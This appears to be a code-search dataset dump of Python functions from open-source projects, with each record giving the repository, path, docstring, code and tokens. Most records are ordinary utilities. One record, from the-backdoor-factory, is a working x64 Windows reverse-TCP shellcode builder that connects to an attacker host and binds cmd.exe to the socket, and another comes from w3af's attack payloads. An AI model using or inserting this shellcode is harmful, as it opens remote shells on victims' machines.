Dataset schema (per-record fields with observed string-length ranges):
nwo: string, 5-106 chars
sha: string, 40 chars
path: string, 4-174 chars
language: string, 1 distinct value
identifier: string, 1-140 chars
parameters: string, 0-87.7k chars
argument_list: string, 1 distinct value
return_statement: string, 0-426k chars
docstring: string, 0-64.3k chars
docstring_summary: string, 0-26.3k chars
docstring_tokens: list
function: string, 18-4.83M chars
function_tokens: list
url: string, 83-304 chars
kivy/buildozer
04f5d0076ea7931fc8aa0588f6a4c81810e2699e
buildozer/__init__.py
python
Buildozer.namify
(self, name)
return re.sub(r'[^a-zA-Z0-9_\-]', '_', name)
Return a "valid" name from a name with lot of invalid chars (allowed characters: a-z, A-Z, 0-9, -, _)
Return a "valid" name from a name with lot of invalid chars (allowed characters: a-z, A-Z, 0-9, -, _)
[ "Return", "a", "valid", "name", "from", "a", "name", "with", "lot", "of", "invalid", "chars", "(", "allowed", "characters", ":", "a", "-", "z", "A", "-", "Z", "0", "-", "9", "-", "_", ")" ]
def namify(self, name):
    '''Return a "valid" name from a name with lot of invalid chars
    (allowed characters: a-z, A-Z, 0-9, -, _)
    '''
    return re.sub(r'[^a-zA-Z0-9_\-]', '_', name)
[ "def", "namify", "(", "self", ",", "name", ")", ":", "return", "re", ".", "sub", "(", "r'[^a-zA-Z0-9_\\-]'", ",", "'_'", ",", "name", ")" ]
https://github.com/kivy/buildozer/blob/04f5d0076ea7931fc8aa0588f6a4c81810e2699e/buildozer/__init__.py#L819-L823
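A standalone check of the substitution above (plain re, no Buildozer instance required; the sample input is made up):

import re

def namify(name):
    # Replace every character outside a-z, A-Z, 0-9, '-', '_' with an underscore.
    return re.sub(r'[^a-zA-Z0-9_\-]', '_', name)

print(namify("My App (beta)!"))  # -> My_App__beta__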
andresriancho/w3af
cd22e5252243a87aaa6d0ddea47cf58dacfe00a9
w3af/plugins/attack/payloads/payloads/apache_root_directory.py
python
apache_root_directory.run_read
(self)
[]
def run_read(self):
    api_result = self.api_read()

    if not api_result['apache_root_directory']:
        return 'Apache root directory not found.'
    else:
        rows = []
        rows.append(['Apache root directories'])
        rows.append([])
        for key_name in api_result:
            for directory in api_result[key_name]:
                rows.append([directory, ])
        result_table = table(rows)
        result_table.draw(80)
        return rows
[ "def", "run_read", "(", "self", ")", ":", "api_result", "=", "self", ".", "api_read", "(", ")", "if", "not", "api_result", "[", "'apache_root_directory'", "]", ":", "return", "'Apache root directory not found.'", "else", ":", "rows", "=", "[", "]", "rows", "...
https://github.com/andresriancho/w3af/blob/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/attack/payloads/payloads/apache_root_directory.py#L57-L71
garrickbrazil/M3D-RPN
bf204e3f95f647d73a132535385119b12c8d6c36
lib/augmentations.py
python
Augmentation.__init__
(self, conf)
[]
def __init__(self, conf):
    self.mean = conf.image_means
    self.stds = conf.image_stds
    self.size = conf.crop_size
    self.mirror_prob = conf.mirror_prob
    self.distort_prob = conf.distort_prob

    if conf.distort_prob <= 0:
        self.augment = Compose([
            ConvertToFloat(),
            RandomMirror(self.mirror_prob),
            Resize(self.size),
            Normalize(self.mean, self.stds)
        ])
    else:
        self.augment = Compose([
            ConvertToFloat(),
            PhotometricDistort(self.distort_prob),
            RandomMirror(self.mirror_prob),
            Resize(self.size),
            Normalize(self.mean, self.stds)
        ])
[ "def", "__init__", "(", "self", ",", "conf", ")", ":", "self", ".", "mean", "=", "conf", ".", "image_means", "self", ".", "stds", "=", "conf", ".", "image_stds", "self", ".", "size", "=", "conf", ".", "crop_size", "self", ".", "mirror_prob", "=", "co...
https://github.com/garrickbrazil/M3D-RPN/blob/bf204e3f95f647d73a132535385119b12c8d6c36/lib/augmentations.py#L337-L359
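The Compose and transform objects above come from lib/augmentations.py; a minimal sketch of the pattern, with toy callables standing in for the real transforms:

class Compose:
    """Apply a sequence of callables to a sample, in order."""

    def __init__(self, transforms):
        self.transforms = transforms

    def __call__(self, sample):
        for transform in self.transforms:
            sample = transform(sample)
        return sample

# Toy stand-ins for ConvertToFloat, Resize, etc.
pipeline = Compose([lambda x: float(x), lambda x: x * 2.0])
print(pipeline(3))  # -> 6.0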
sabnzbd/sabnzbd
52d21e94d3cc6e30764a833fe2a256783d1a8931
sabnzbd/bpsmeter.py
python
this_week
(t: float)
return time.mktime(monday)
Return timestamp for start of this week (monday)
Return timestamp for start of this week (monday)
[ "Return", "timestamp", "for", "start", "of", "this", "week", "(", "monday", ")" ]
def this_week(t: float) -> float:
    """Return timestamp for start of this week (monday)"""
    while 1:
        tm = time.localtime(t)
        if tm.tm_wday == 0:
            break
        t -= DAY
    monday = (tm.tm_year, tm.tm_mon, tm.tm_mday, 0, 0, 0, 0, 0, tm.tm_isdst)
    return time.mktime(monday)
[ "def", "this_week", "(", "t", ":", "float", ")", "->", "float", ":", "while", "1", ":", "tm", "=", "time", ".", "localtime", "(", "t", ")", "if", "tm", ".", "tm_wday", "==", "0", ":", "break", "t", "-=", "DAY", "monday", "=", "(", "tm", ".", ...
https://github.com/sabnzbd/sabnzbd/blob/52d21e94d3cc6e30764a833fe2a256783d1a8931/sabnzbd/bpsmeter.py#L48-L56
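A self-contained version for experimentation; DAY is assumed to be sabnzbd's seconds-per-day constant:

import time

DAY = 24 * 60 * 60  # assumed value of sabnzbd's DAY constant

def this_week(t):
    # Walk back one day at a time until we land on a Monday ...
    while True:
        tm = time.localtime(t)
        if tm.tm_wday == 0:  # Monday
            break
        t -= DAY
    # ... then truncate to midnight of that day.
    monday = (tm.tm_year, tm.tm_mon, tm.tm_mday, 0, 0, 0, 0, 0, tm.tm_isdst)
    return time.mktime(monday)

print(time.ctime(this_week(time.time())))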
secretsquirrel/the-backdoor-factory
9972ac64e2860351a2132e56e6ac191af9b978bb
intel/WinIntelPE64.py
python
winI64_shellcode.iat_reverse_tcp_inline
(self, flItms, CavesPicked={})
return (self.stackpreserve + self.shellcode1, self.shellcode2 + self.stackrestore)
Position dependent shellcode that uses API thunks of LoadLibraryA and GetProcAddress to find and load APIs for callback to C2.
Position dependent shellcode that uses API thunks of LoadLibraryA and GetProcAddress to find and load APIs for callback to C2.
[ "Position", "dependent", "shellcode", "that", "uses", "API", "thunks", "of", "LoadLibraryA", "and", "GetProcAddress", "to", "find", "and", "load", "APIs", "for", "callback", "to", "C2", "." ]
def iat_reverse_tcp_inline(self, flItms, CavesPicked={}):
    """
    Position dependent shellcode that uses API thunks of LoadLibraryA
    and GetProcAddress to find and load APIs for callback to C2.
    """
    flItms['apis_needed'] = ['LoadLibraryA', 'GetProcAddress']
    for api in flItms['apis_needed']:
        if api not in flItms:
            return False
    if self.PORT is None:
        print ("This payload requires the PORT parameter -P")
        return False
    if self.HOST is None:
        print "This payload requires a HOST parameter -H"
        return False
    self.shellcode1 = "\xfc"        # CLD
    self.shellcode1 += "\x49\xBE"   # mov value below to r14
    # Think about putting the LOADLIBA and GETPROCADDRESS in rX regs
    if flItms['LoadLibraryA'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']) < 0:
        self.shellcode1 += struct.pack("<Q", 0xffffffff + (flItms['LoadLibraryA'] -
                                       (flItms['AddressOfEntryPoint'] + flItms['ImageBase']) + 1))
    else:
        self.shellcode1 += struct.pack("<Q", flItms['LoadLibraryA'] -
                                       (flItms['AddressOfEntryPoint'] + flItms['ImageBase']))
    # RDX holds entry point
    self.shellcode1 += "\x49\x01\xD6"   # add r14 + RDX
    self.shellcode1 += "\x49\xBF"       # mov value below to r15
    if flItms['GetProcAddress'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']) < 0:
        self.shellcode1 += struct.pack("<Q", 0xffffffff + (flItms['GetProcAddress'] -
                                       (flItms['AddressOfEntryPoint'] + flItms['ImageBase']) + 1))
    else:
        self.shellcode1 += struct.pack("<Q", flItms['GetProcAddress'] -
                                       (flItms['AddressOfEntryPoint'] + flItms['ImageBase']))
    self.shellcode1 += "\x49\x01\xD7"   # add r15 + RDX
    # LoadLibraryA in r14
    # GetProcAddress in r15
    '''
    Winx64 asm calling convention
    RCX, RDX, R8, R9 for the first four integer or pointer arguments (in that order),
    and XMM0, XMM1, XMM2, XMM3 are used for floating point arguments.
    Additional arguments are pushed onto the stack (right to left).
    Integer return values (similar to x86) are returned in RAX if 64 bits or less.
    Floating point return values are returned in XMM0.
    Parameters less than 64 bits long are not zero extended; the high bits are not zeroed.
    The caller reserves space on the stack (unlike x86)
    rbx
    rbp
    r12
    r13
    r14: LoadLibraryA
    r15: GetProcAddress
    '''
    self.shellcode1 += ("\x49\xbb\x77\x73\x32\x5F\x33\x32\x00\x00"  # mov r11, ws2_32
                        "\x41\x53"                       # push r11
                        "\x49\x89\xE3"                   # mov r11, rsp
                        "\x48\x81\xEC\xA0\x01\x00\x00"   # sub rsp, 408+8  # size of WSAData
                        "\x48\x89\xE6"                   # mov rsi, rsp  pointer to WSAData struct
                        "\x48\xBF\x02\x00"
                        )
    self.shellcode1 += struct.pack('!H', self.PORT)
    self.shellcode1 += self.pack_ip_addresses()
    self.shellcode1 += ("\x57"                           # push rdi
                        "\x48\x89\xE7"                   # mov rdi, rsp  pointer to data
                        "\x4C\x89\xD9"                   # mov rcx, r11  #ws2_32
                        "\x48\x83\xEC\x20"               # sub rsp, 0x20
                        "\x41\xff\x16"                   # call qword ptr [r14] ; LoadLibA
                        "\x49\x89\xC5"                   # mov r13, rax ; handle ws2_32 to r13
                        # handle ws2_32 to r13
                        "\x48\x89\xC1"                   # mov rcx, rax
                        "\xeb\x0c"                       # short jmp over api
                        "\x57\x53\x41\x53\x74\x61"       # WSAStartup
                        "\x72\x74\x75\x70\x00\x00"       # ...
                        "\x48\x8D\x15\xED\xFF\xFF\xFF"   # lea rdx, [rip-19]
                        "\x48\x83\xEC\x20"               # sub rsp, 0x20
                        "\x41\xFF\x17"                   # Call qword ptr [r15] ; GetProcAddr
                        "\x48\x95"                       # xchg rbp, rax ; mov wsastartup to rbp
                        # wsastartup to rbp
                        "\xeb\x0c"                       # jmp over WSASocketA
                        "\x57\x53\x41\x53\x6f\x63"       # WSASocketA
                        "\x6b\x65\x74\x41\x00\x00"       #
                        "\x48\x8D\x15\xED\xFF\xFF\xFF"   # lea rdx, [rip-19]
                        "\x4C\x89\xE9"                   # mov rcx, r13
                        "\x48\x83\xEC\x20"               # sub rsp, 0x20
                        "\x41\xFF\x17"                   # call qword ptr [r15] GetProcAddr WSASocketA
                        "\x49\x94"                       # xchg r12, rax ; mov WSASocketA to r12
                        # WSASocketA to r12
                        "\x48\x89\xF2"                   # mov rdx, rsi ; mov point to struct
                        "\x68\x01\x01\x00\x00"           # push 0x0101
                        "\x59"                           # pop rcx
                        "\x48\x83\xEC\x20"               # sub rsp, 0x20
                        "\xff\xd5"                       # call rbp ; WSAStartup(0x0101, &WSAData);
                        "\x50"                           # push rax
                        "\x50"                           # push rax
                        "\x4D\x31\xC0"                   # xor r8, r8
                        "\x4D\x31\xC9"                   # xor r9, r9
                        "\x48\xff\xC0"                   # inc rax
                        "\x48\x89\xC2"                   # mov rdx, rax
                        "\x48\xff\xC0"                   # inc rax
                        "\x48\x89\xC1"                   # mov rdx, rax
                        "\x48\x83\xEC\x20"               # sub rsp, 0x20
                        "\x41\xFF\xD4"                   # call r12 ;WSASocketA(AF_INT, SOCK_STREAM, 0 0 0 0)
                        "\x49\x94"                       # xchg r12, rax ; mov socket to r12
                        # get connect
                        "\x48\xBA\x63\x6F\x6E\x6E\x65\x63\x74\x00"  # mov rdx, "connect\x00"
                        "\x52"                           # push rdx
                        "\x48\x89\xE2"                   # mov rdx, rsp
                        "\x4C\x89\xE9"                   # mov rcx, r13; ws2_32 handle
                        "\x48\x83\xEC\x20"               # sub rsp, 0x20
                        "\x41\xFF\x17"                   # call qword ptr [r15] ;GetProcAddr connect
                        "\x48\x89\xC3"                   # mov rbx, rax ;connect api
                        "\x6A\x10"                       # push 16
                        "\x41\x58"                       # pop r8
                        "\x48\x89\xFA"                   # mov rdx, rdi
                        "\x4C\x89\xE1"                   # mov rcx, r12
                        "\x48\x83\xEC\x20"               # sub rsp, 0x20
                        "\xFF\xD3"                       # call rbx ;connect (s, &sockaddr, 16)
                        "\x48\x81\xC4\xb8\x02\x00\x00"   # add rsp, 0x2b8
                        )
    # socket is in r12
    # breakupvar is the distance between codecaves
    breakupvar = eat_code_caves(flItms, 0, 1)
    if flItms['cave_jumping'] is True:
        self.shellcode1 += "\xe9"  # JMP opcode
        if breakupvar > 0:
            if len(self.shellcode1) < breakupvar:
                self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
                                               len(self.shellcode1) - 4).rstrip("L")), 16))
            else:
                self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
                                               breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
        else:
            self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar -
                                           len(self.stackpreserve) - len(self.shellcode1) - 3)
    self.shellcode2 = ("\xeb\x09"                        # jump over kernel32
                       "\x6b\x65\x72\x6e\x65\x6c\x33\x32\x00"  # kernel32,00
                       "\x48\x8D\x0D\xF0\xFF\xFF\xFF"    # lea rcx, [rip-4]
                       "\x48\x83\xEC\x20"                # sub rsp, 20
                       "\x41\xFF\x16"                    # call qword ptr [r14]
                       # getprocaddress CreateProcessA
                       "\x49\x89\xC5"                    # mov r13, rax ; mov kernel32 to r13
                       "\x48\x89\xC1"                    # mov rcx, rax
                       "\xeb\x0f"                        # jump over CreateProcessA,0
                       "\x43\x72\x65\x61\x74\x65\x50"    # CreateProcessA
                       "\x72\x6f\x63\x65\x73\x73\x41\x00"  # ...
                       "\x48\x8D\x15\xEA\xFF\xFF\xFF"    # lea rdx, [rip - 22]
                       "\x48\x83\xEC\x20"                # sub rsp, 20
                       "\x41\xFF\x17"                    # call qword ptr [r15] GetProcAddr CreateProcessA
                       # CreateProcessesA in rax
                       "\x48\x89\xC7"                    # mov rdi, rax ;mov CreateProcessA to rdi
                       "\x49\x87\xFC"                    # xchg r12, rdi (socket handle for CreateProcessA)
                       # socket is in rdi
                       # shell:
                       "\x49\xb8\x63\x6d\x64\x00\x00\x00\x00\x00"  # mov r8, 'cmd'
                       "\x41\x50"          # push r8 ; an extra push for alignment
                       "\x41\x50"          # push r8 ; push our command line: 'cmd',0
                       "\x48\x89\xe2"      # mov rdx, rsp ; save a pointer to the command line
                       "\x57"              # push rdi ; our socket becomes the shells hStdError
                       "\x57"              # push rdi ; our socket becomes the shells hStdOutput
                       "\x57"              # push rdi ; our socket becomes the shells hStdInput
                       "\x4d\x31\xc0"      # xor r8, r8 ; Clear r8 for all the NULL's we need to push
                       "\x6a\x0d"          # push byte 13 ; We want to place 104 (13 * 8) null bytes onto the stack
                       "\x59"              # pop rcx ; Set RCX for the loop
                       # 1 push_loop: ;
                       "\x41\x50"          # push r8 ; push a null qword
                       "\xe2\xfc"          # loop push_loop ; keep looping untill we have pushed enough nulls
                       "\x66\xc7\x44\x24\x54\x01\x01"  # mov word [rsp+84], 0x0101 ; Set the STARTUPINFO Structure's dwFlags to STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW
                       "\x48\x8d\x44\x24\x18"  # lea rax, [rsp+24] ; Set RAX as a pointer to our STARTUPINFO Structure
                       "\xc6\x00\x68"      # mov byte [rax], 104 ; Set the size of the STARTUPINFO Structure
                       "\x48\x89\xe6"      # mov rsi, rsp ; Save the pointer to the PROCESS_INFORMATION Structure
                       # ; 1 perform the call to CreateProcessA
                       "\x56"              # push rsi ; Push the pointer to the PROCESS_INFORMATION Structure
                       "\x50"              # push rax ; Push the pointer to the STARTUPINFO Structure
                       "\x41\x50"          # push r8 ; The lpCurrentDirectory is NULL so the new process will have the same current directory as its parent
                       "\x41\x50"          # push r8 ; The lpEnvironment is NULL so the new process will have the same enviroment as its parent
                       "\x41\x50"          # push r8 ; We dont specify any dwCreationFlags
                       "\x49\xff\xc0"      # inc r8 ; Increment r8 to be one
                       "\x41\x50"          # push r8 ; Set bInheritHandles to TRUE in order to inheritable all possible handle from the parent
                       "\x49\xff\xc8"      # dec r8 ; Decrement r8 (third param) back down to zero
                       "\x4d\x89\xc1"      # mov r9, r8 ; Set fourth param, lpThreadAttributes to NULL
                       # ; r8 = lpProcessAttributes (NULL)
                       # ; rdx = the lpCommandLine to point to "cmd",0
                       "\x4c\x89\xc1"      # mov rcx, r8 ; Set lpApplicationName to NULL as we are using the command line param instead
                       "\x48\x83\xEC\x20"  # sub rsp, 20
                       "\x41\xFF\xD4"      # call r12 ; CreateProcessA( 0, &"cmd", 0, 0, TRUE, 0, 0, 0, &si, &pi );
                       # perform the call to WaitForSingleObject
                       "\xeb\x14"          # jmp over WaitForSingleObject
                       "\x57\x61\x69\x74\x46\x6f\x72\x53"  # WaitForSingleObject
                       "\x69\x6e\x67\x6c\x65\x4f\x62\x6a"  # ...
                       "\x65\x63\x74\x00"  # ...
                       "\x48\x8D\x15\xE5\xFF\xFF\xFF"  # lea rdx, [rip-27]
                       "\x4C\x89\xE9"      # mov rcx, r13 ; mov kernel32 handle to rcx
                       "\x48\x83\xEC\x20"  # sub rsp, 0x20
                       "\x41\xFF\x17"      # call qword ptr [r15] GetProcAddr WaitForSingleObject
                       # WaitForSingleObject is in rax
                       "\x48\x31\xd2"      # xor rdx, rdx
                       "\x8b\x0e"          # mov ecx, dword [rsi] ; set the first param to the handle from our PROCESS_INFORMATION.hProcess
                       "\x48\x83\xEC\x20"  # sub rsp, 0x20
                       "\xFF\xD0"          # call rax; WaitForSingleObject( pi.hProcess, INFINITE );
                       # Fix Up rsp
                       "\x48\x81\xC4\x50\x01\x00\x00"  # add rsp, 0x150
                       )
    self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2 + self.stackrestore
    return (self.stackpreserve + self.shellcode1, self.shellcode2 + self.stackrestore)
[ "def", "iat_reverse_tcp_inline", "(", "self", ",", "flItms", ",", "CavesPicked", "=", "{", "}", ")", ":", "flItms", "[", "'apis_needed'", "]", "=", "[", "'LoadLibraryA'", ",", "'GetProcAddress'", "]", "for", "api", "in", "flItms", "[", "'apis_needed'", "]", ...
https://github.com/secretsquirrel/the-backdoor-factory/blob/9972ac64e2860351a2132e56e6ac191af9b978bb/intel/WinIntelPE64.py#L930-L1139
reviewboard/reviewboard
7395902e4c181bcd1d633f61105012ffb1d18e1b
reviewboard/hostingsvcs/utils/paginator.py
python
APIPaginator.__init__
(self, client, url, query_params={}, *args, **kwargs)
Initialize the paginator. Once initialized, the first page will be fetched automatically. Args: client (reviewboard.hostingsvcs.service.HostingServiceClient): The hosting service client used to make requests. url (unicode): The URL used to make requests. query_params (dict): The query parameters to append to the URL for requests. This will be updated with :py:attr:`start_query_param` and :py:attr:`per_page_query_param`, if set. *args (tuple): Positional arguments for the parent constructor. **kwargs (dict): Keyword arguments for the parent constructor.
Initialize the paginator.
[ "Initialize", "the", "paginator", "." ]
def __init__(self, client, url, query_params={}, *args, **kwargs):
    """Initialize the paginator.

    Once initialized, the first page will be fetched automatically.

    Args:
        client (reviewboard.hostingsvcs.service.HostingServiceClient):
            The hosting service client used to make requests.

        url (unicode):
            The URL used to make requests.

        query_params (dict):
            The query parameters to append to the URL for requests.
            This will be updated with :py:attr:`start_query_param`
            and :py:attr:`per_page_query_param`, if set.

        *args (tuple):
            Positional arguments for the parent constructor.

        **kwargs (dict):
            Keyword arguments for the parent constructor.
    """
    super(APIPaginator, self).__init__(*args, **kwargs)

    self.client = client
    self.url = url
    self.prev_url = None
    self.next_url = None
    self.page_headers = None

    # Augment the URL with the provided query parameters.
    query_params = query_params.copy()

    if self.start_query_param and self.start:
        query_params[self.start_query_param] = self.start

    if self.per_page_query_param and self.per_page:
        query_params[self.per_page_query_param] = self.per_page

    self.request_kwargs.setdefault('query', {}).update(query_params)

    self._fetch_page()
[ "def", "__init__", "(", "self", ",", "client", ",", "url", ",", "query_params", "=", "{", "}", ",", "*", "args", ",", "*", "*", "kwargs", ")", ":", "super", "(", "APIPaginator", ",", "self", ")", ".", "__init__", "(", "*", "args", ",", "*", "*", ...
https://github.com/reviewboard/reviewboard/blob/7395902e4c181bcd1d633f61105012ffb1d18e1b/reviewboard/hostingsvcs/utils/paginator.py#L221-L263
mlcommons/training
4a4d5a0b7efe99c680306b1940749211d4238a84
rnn_translator/pytorch/seq2seq/train/fp_optimizers.py
python
Fp16Optimizer.__init__
(self, fp16_model, grad_clip=float('inf'), loss_scale=8192, dls_downscale=2, dls_upscale=2, dls_upscale_interval=128)
Constructor for the Fp16Optimizer. :param fp16_model: model (previously casted to half) :param grad_clip: coefficient for gradient clipping, max L2 norm of the gradients :param loss_scale: initial loss scale :param dls_downscale: loss downscale factor, loss scale is divided by this factor when NaN/INF occurs in the gradients :param dls_upscale: loss upscale factor, loss scale is multiplied by this factor if previous dls_upscale_interval batches finished successfully :param dls_upscale_interval: interval for loss scale upscaling
Constructor for the Fp16Optimizer.
[ "Constructor", "for", "the", "Fp16Optimizer", "." ]
def __init__(self, fp16_model, grad_clip=float('inf'), loss_scale=8192,
             dls_downscale=2, dls_upscale=2, dls_upscale_interval=128):
    """
    Constructor for the Fp16Optimizer.

    :param fp16_model: model (previously casted to half)
    :param grad_clip: coefficient for gradient clipping, max L2 norm of the
        gradients
    :param loss_scale: initial loss scale
    :param dls_downscale: loss downscale factor, loss scale is divided by
        this factor when NaN/INF occurs in the gradients
    :param dls_upscale: loss upscale factor, loss scale is multiplied by
        this factor if previous dls_upscale_interval batches finished
        successfully
    :param dls_upscale_interval: interval for loss scale upscaling
    """
    logging.info('Initializing fp16 optimizer')
    self.initialize_model(fp16_model)

    self.since_last_invalid = 0
    self.loss_scale = loss_scale
    self.dls_downscale = dls_downscale
    self.dls_upscale = dls_upscale
    self.dls_upscale_interval = dls_upscale_interval
    self.grad_clip = grad_clip
[ "def", "__init__", "(", "self", ",", "fp16_model", ",", "grad_clip", "=", "float", "(", "'inf'", ")", ",", "loss_scale", "=", "8192", ",", "dls_downscale", "=", "2", ",", "dls_upscale", "=", "2", ",", "dls_upscale_interval", "=", "128", ")", ":", "loggin...
https://github.com/mlcommons/training/blob/4a4d5a0b7efe99c680306b1940749211d4238a84/rnn_translator/pytorch/seq2seq/train/fp_optimizers.py#L37-L61
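The dls_* parameters describe a dynamic loss-scaling policy: divide the scale when gradients overflow, multiply it back after a clean streak. A minimal sketch of that policy (an illustration, not the MLPerf implementation itself):

class DynamicLossScale:
    def __init__(self, scale=8192, downscale=2, upscale=2, interval=128):
        self.scale = scale
        self.downscale = downscale
        self.upscale = upscale
        self.interval = interval
        self.since_last_invalid = 0

    def update(self, grads_finite):
        if not grads_finite:
            self.scale /= self.downscale    # NaN/INF seen: back off
            self.since_last_invalid = 0
        else:
            self.since_last_invalid += 1
            if self.since_last_invalid >= self.interval:
                self.scale *= self.upscale  # long clean streak: grow again
                self.since_last_invalid = 0

scaler = DynamicLossScale()
scaler.update(grads_finite=False)
print(scaler.scale)  # 4096.0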
openstack/nova
b49b7663e1c3073917d5844b81d38db8e86d05c4
nova/compute/manager.py
python
ComputeVirtAPI.update_compute_provider_status
(self, context, rp_uuid, enabled)
Used to add/remove the COMPUTE_STATUS_DISABLED trait on the provider :param context: nova auth RequestContext :param rp_uuid: UUID of a compute node resource provider in Placement :param enabled: True if the node is enabled in which case the trait would be removed, False if the node is disabled in which case the trait would be added. :raises: ResourceProviderTraitRetrievalFailed :raises: ResourceProviderUpdateConflict :raises: ResourceProviderUpdateFailed :raises: TraitRetrievalFailed :raises: keystoneauth1.exceptions.ClientException
Used to add/remove the COMPUTE_STATUS_DISABLED trait on the provider
[ "Used", "to", "add", "/", "remove", "the", "COMPUTE_STATUS_DISABLED", "trait", "on", "the", "provider" ]
def update_compute_provider_status(self, context, rp_uuid, enabled):
    """Used to add/remove the COMPUTE_STATUS_DISABLED trait on the provider

    :param context: nova auth RequestContext
    :param rp_uuid: UUID of a compute node resource provider in Placement
    :param enabled: True if the node is enabled in which case the trait
        would be removed, False if the node is disabled in which case
        the trait would be added.
    :raises: ResourceProviderTraitRetrievalFailed
    :raises: ResourceProviderUpdateConflict
    :raises: ResourceProviderUpdateFailed
    :raises: TraitRetrievalFailed
    :raises: keystoneauth1.exceptions.ClientException
    """
    trait_name = os_traits.COMPUTE_STATUS_DISABLED
    # Get the current traits (and generation) for the provider.
    # TODO(mriedem): Leverage the ProviderTree cache in get_provider_traits
    trait_info = self.reportclient.get_provider_traits(context, rp_uuid)
    # If the host is enabled, remove the trait (if set), else add
    # the trait if it doesn't already exist.
    original_traits = trait_info.traits
    new_traits = None
    if enabled and trait_name in original_traits:
        new_traits = original_traits - {trait_name}
        LOG.debug('Removing trait %s from compute node resource '
                  'provider %s in placement.', trait_name, rp_uuid)
    elif not enabled and trait_name not in original_traits:
        new_traits = original_traits | {trait_name}
        LOG.debug('Adding trait %s to compute node resource '
                  'provider %s in placement.', trait_name, rp_uuid)
    if new_traits is not None:
        self.reportclient.set_traits_for_provider(
            context, rp_uuid, new_traits, generation=trait_info.generation)
[ "def", "update_compute_provider_status", "(", "self", ",", "context", ",", "rp_uuid", ",", "enabled", ")", ":", "trait_name", "=", "os_traits", ".", "COMPUTE_STATUS_DISABLED", "# Get the current traits (and generation) for the provider.", "# TODO(mriedem): Leverage the ProviderTr...
https://github.com/openstack/nova/blob/b49b7663e1c3073917d5844b81d38db8e86d05c4/nova/compute/manager.py#L495-L528
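The trait toggle reduces to set arithmetic on the provider's current traits; a toy illustration with plain Python sets:

TRAIT = "COMPUTE_STATUS_DISABLED"

def new_traits(original, enabled):
    # Enabled host: drop the trait if present; disabled host: add it if missing.
    if enabled and TRAIT in original:
        return original - {TRAIT}
    if not enabled and TRAIT not in original:
        return original | {TRAIT}
    return None  # nothing to update in Placement

print(new_traits({TRAIT, "HW_CPU_X86_AVX"}, enabled=True))  # {'HW_CPU_X86_AVX'}
print(new_traits({"HW_CPU_X86_AVX"}, enabled=False))        # both traits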
PennyLaneAI/pennylane
1275736f790ced1d778858ed383448d4a43a4cdd
pennylane/hf/hartree_fock.py
python
hf_energy
(mol)
return energy
r"""Return a function that computes the Hartree-Fock energy. Args: mol (Molecule): the molecule object Returns: function: function that computes the Hartree-Fock energy **Example** >>> symbols = ['H', 'H'] >>> geometry = np.array([[0.0, 0.0, 0.0], [0.0, 0.0, 1.0]], requires_grad = False) >>> alpha = np.array([[3.42525091, 0.62391373, 0.1688554], >>> [3.42525091, 0.62391373, 0.1688554]], requires_grad=True) >>> mol = qml.hf.Molecule(symbols, geometry, alpha=alpha) >>> args = [alpha] >>> hf_energy(mol)(*args) -1.065999461545263
r"""Return a function that computes the Hartree-Fock energy.
[ "r", "Return", "a", "function", "that", "computes", "the", "Hartree", "-", "Fock", "energy", "." ]
def hf_energy(mol):
    r"""Return a function that computes the Hartree-Fock energy.

    Args:
        mol (Molecule): the molecule object

    Returns:
        function: function that computes the Hartree-Fock energy

    **Example**

    >>> symbols  = ['H', 'H']
    >>> geometry = np.array([[0.0, 0.0, 0.0], [0.0, 0.0, 1.0]], requires_grad = False)
    >>> alpha = np.array([[3.42525091, 0.62391373, 0.1688554],
    >>>                   [3.42525091, 0.62391373, 0.1688554]], requires_grad=True)
    >>> mol = qml.hf.Molecule(symbols, geometry, alpha=alpha)
    >>> args = [alpha]
    >>> hf_energy(mol)(*args)
    -1.065999461545263
    """

    def energy(*args):
        r"""Compute the Hartree-Fock energy.

        Args:
            args (array[array[float]]): initial values of the differentiable parameters

        Returns:
            float: the Hartree-Fock energy
        """
        _, coeffs, fock_matrix, h_core, _ = generate_scf(mol)(*args)
        e_rep = nuclear_energy(mol.nuclear_charges, mol.coordinates)(*args)
        e_elec = anp.einsum(
            "pq,qp", fock_matrix + h_core, molecular_density_matrix(mol.n_electrons, coeffs)
        )
        return e_elec + e_rep

    return energy
[ "def", "hf_energy", "(", "mol", ")", ":", "def", "energy", "(", "*", "args", ")", ":", "r\"\"\"Compute the Hartree-Fock energy.\n\n Args:\n args (array[array[float]]): initial values of the differentiable parameters\n\n Returns:\n float: the Hartree-Fock...
https://github.com/PennyLaneAI/pennylane/blob/1275736f790ced1d778858ed383448d4a43a4cdd/pennylane/hf/hartree_fock.py#L226-L263
pjkundert/cpppo
4c217b6c06b88bede3888cc5ea2731f271a95086
tools/waits.py
python
existence.truth
( self, predicate )
return True
Waits for predicate to evaluate. We'll keep doubling the delay (exponential backoff) 'til we get to 1/2 the timeout, when we'll begin using 1/2 the remaining timeout. The only valid states are that that the file doesn't exist, or that it exists and is readable. Everything else (eg. exists but unreadable, some other I/O error) is indeterminate, and results in the existence detection continuing (until timeout).
Waits for predicate to evaluate. We'll keep doubling the delay (exponential backoff) 'til we get to 1/2 the timeout, when we'll begin using 1/2 the remaining timeout.
[ "Waits", "for", "predicate", "to", "evaluate", ".", "We", "ll", "keep", "doubling", "the", "delay", "(", "exponential", "backoff", ")", "til", "we", "get", "to", "1", "/", "2", "the", "timeout", "when", "we", "ll", "begin", "using", "1", "/", "2", "t...
def truth( self, predicate ):
    """Waits for predicate to evaluate.  We'll keep doubling the delay
    (exponential backoff) 'til we get to 1/2 the timeout, when we'll begin
    using 1/2 the remaining timeout.

    The only valid states are that that the file doesn't exist, or that it
    exists and is readable.  Everything else (eg. exists but unreadable, some
    other I/O error) is indeterminate, and results in the existence detection
    continuing (until timeout).
    """
    delay = 0
    found = None
    while found != self.presence:
        found = bool(predicate())
        if found != self.presence:
            now = misc.timer()
            if self.timeout is not None:
                # A finite timeout
                if now >= self.started + self.timeout:
                    log.info( "waits for truth: %r; timeout of %s exceeded" % (
                        predicate, None if self.timeout is None else "%.3fs" % self.timeout ))
                    return False
            if self.idle_service:
                self.idle_service()
            delay = self.delay( target=delay*2, now=now )
